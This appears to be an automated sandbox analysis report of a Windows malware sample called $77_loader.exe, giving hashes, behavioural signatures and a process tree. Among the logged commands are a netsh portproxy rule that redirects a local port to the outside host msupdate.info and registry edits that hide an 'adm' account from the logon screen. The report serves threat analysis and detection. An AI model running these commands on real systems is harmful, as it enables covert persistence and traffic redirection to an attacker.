Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-05-2022 11:43
Static task
static1
Behavioral task
behavioral1
Sample
$77_loader.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
$77_loader.exe
Resource
win10v2004-20220414-en
General
-
Target
$77_loader.exe
-
Size
397KB
-
MD5
aff57ee1a4f3731c2036046910f78fb4
-
SHA1
ef9627c0cadff85a3dfaab6aef0b7c885f03b186
-
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
-
SHA512
5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
RMS.exepid process 2004 RMS.exe -
Sets file execution options in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$77_loader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation $77_loader.exe -
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
$77_loader.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList $77_loader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts $77_loader.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" $77_loader.exe -
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
$77_loader.exedescription ioc process File created C:\Windows\SoftwareDistribution\config.xml $77_loader.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml $77_loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXENETSTAT.EXEpid process 4460 NETSTAT.EXE 3216 NETSTAT.EXE 3348 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
$77_loader.exepid process 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe 924 $77_loader.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
$77_loader.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXEdescription pid process Token: SeDebugPrivilege 924 $77_loader.exe Token: SeSecurityPrivilege 3572 msiexec.exe Token: SeDebugPrivilege 4460 NETSTAT.EXE Token: SeDebugPrivilege 3216 NETSTAT.EXE Token: SeDebugPrivilege 3348 NETSTAT.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
$77_loader.execsc.exedescription pid process target process PID 924 wrote to memory of 3280 924 $77_loader.exe csc.exe PID 924 wrote to memory of 3280 924 $77_loader.exe csc.exe PID 3280 wrote to memory of 2412 3280 csc.exe cvtres.exe PID 3280 wrote to memory of 2412 3280 csc.exe cvtres.exe PID 924 wrote to memory of 2876 924 $77_loader.exe chcp.com PID 924 wrote to memory of 2876 924 $77_loader.exe chcp.com PID 924 wrote to memory of 4276 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 4276 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 4460 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 4460 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 3216 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 3216 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 3348 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 3348 924 $77_loader.exe NETSTAT.EXE PID 924 wrote to memory of 1700 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 1700 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3132 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3132 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3312 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3312 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 2808 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 2808 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3744 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 3744 924 $77_loader.exe netsh.exe PID 924 wrote to memory of 2004 924 $77_loader.exe RMS.exe PID 924 wrote to memory of 2004 924 $77_loader.exe RMS.exe PID 924 wrote to memory of 2004 924 $77_loader.exe RMS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"1⤵
- Checks computer location settings
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp"3⤵PID:2412
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵PID:2876
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:4276
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4460 -
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3216 -
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3348 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵PID:1700
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:3132
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info2⤵PID:3312
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:2808
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:3744
-
C:\Users\Admin\AppData\Local\Temp\RMS.exe"C:\Users\Admin\AppData\Local\Temp\RMS.exe"2⤵
- Executes dropped EXE
PID:2004
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3572
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56621e21b1f79d57fea5b7f660526cc0d
SHA15c1951409c8a761be7de78391ace2f7fbc972c3a
SHA256279b9fb0494206b6562f826998ca6f2b5af552d84c142686936992c745aaae5b
SHA512059a22049966c4562a87e8bd1145381f11110f396569823aae6ac42f96e9e03f2125eed3a062c06332dfac893990ddde73d3919f07975293c4f35aaa15f08da4
-
Filesize
11KB
MD5c91fc1037127f6b80d0bd8214100d8a1
SHA154f0e018a94ba3394fdc0d0d7ae1266c1fa2b4ec
SHA25681eda64e81398b2e2aa3c10f9512df43f97bbb4eff244316affc64544346d5eb
SHA5128ed342be209b892297c5f89fa6e0866b72ae9bda20220758b26dc9ad97382135a3e105801070fbf9638851b5d47556827ca912109d5bf22d7948f3c7a08c7a1d
-
Filesize
1KB
MD5c666d634ada8f4e17b7ea27c58c45d43
SHA1be0d200ce987774c64d211d1933bcfa59d422b06
SHA25681c8b1585aa586f7a713c6379c627731040ebd6548dd95d6226c4293b4a41512
SHA5124d0a5542d0b8ab822a592a215f50efa51d9af892deaef45566922e9754ecb36e85d4464a1b7f475f94cc70f765601a94759ab2a4ccc96537921c71480c2b260a
-
Filesize
8.3MB
MD573f351beae5c881fafe36f42cde9a47c
SHA1dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
Filesize
8.3MB
MD573f351beae5c881fafe36f42cde9a47c
SHA1dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
Filesize
447B
MD51640a04633fee0dfdc7e22c4f4063bf6
SHA13cb525c47b5dd37f8ee45b034c9452265fba5476
SHA25655e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
SHA51285c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
-
Filesize
309B
MD5d857d70711643aaf2282e7c220530081
SHA18f783c6b233e7675a9a6633d5ed5f44bcc5d0779
SHA256042f78299f09cb6b4de318cf9c2a2758606eff5bebd25d4c2fd388d3ac03f309
SHA5120b0603ba42bb86466c95b37dd1a0657d646dbcfe741ff7223cf6cc54a73efa307a3c49030b06c2d8727151e353ed7c98784ccfe23e88e5f444606ae5d04277af
-
Filesize
652B
MD51f555cf55bef11bc4dc295f80e6a3e29
SHA19538a4734ecc52ac3f89b0e4411d4c61c7ae7473
SHA2560f53e2cfd88c6138e5784731871ef605dbc32a750c43aad3604d16ee44fe991c
SHA512cec2e94d0662b7ac497f104a11ccfe9bdfa70f0b89affbda8dc109633154a7a1e33424c48ac42c4bfb701e1df5bbf40765c1f91711e378332046c356add88928